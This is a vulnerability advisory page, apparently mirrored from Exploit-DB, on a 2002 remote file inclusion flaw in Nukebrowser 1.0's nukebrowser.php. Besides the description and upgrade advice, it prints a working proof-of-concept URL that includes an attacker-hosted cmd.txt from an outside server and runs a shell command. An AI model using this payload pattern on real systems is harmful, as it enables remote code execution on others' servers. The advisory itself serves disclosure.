header-logo
Suggest Exploit
vendor:
Nukebrowser
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Nukebrowser
Affected Version From: Nukebrowser 1.0
Affected Version To: Nukebrowser 1.0
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: o:nukebrowser:nukebrowser:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

Nukebrowser Remote File Inclusion Vulnerability

Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file. Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.

Mitigation:

Upgrade to the latest version of Nukebrowser
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6731/info

Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file.

Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.

http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id

Navigation

Suggest Exploit

Services By CQR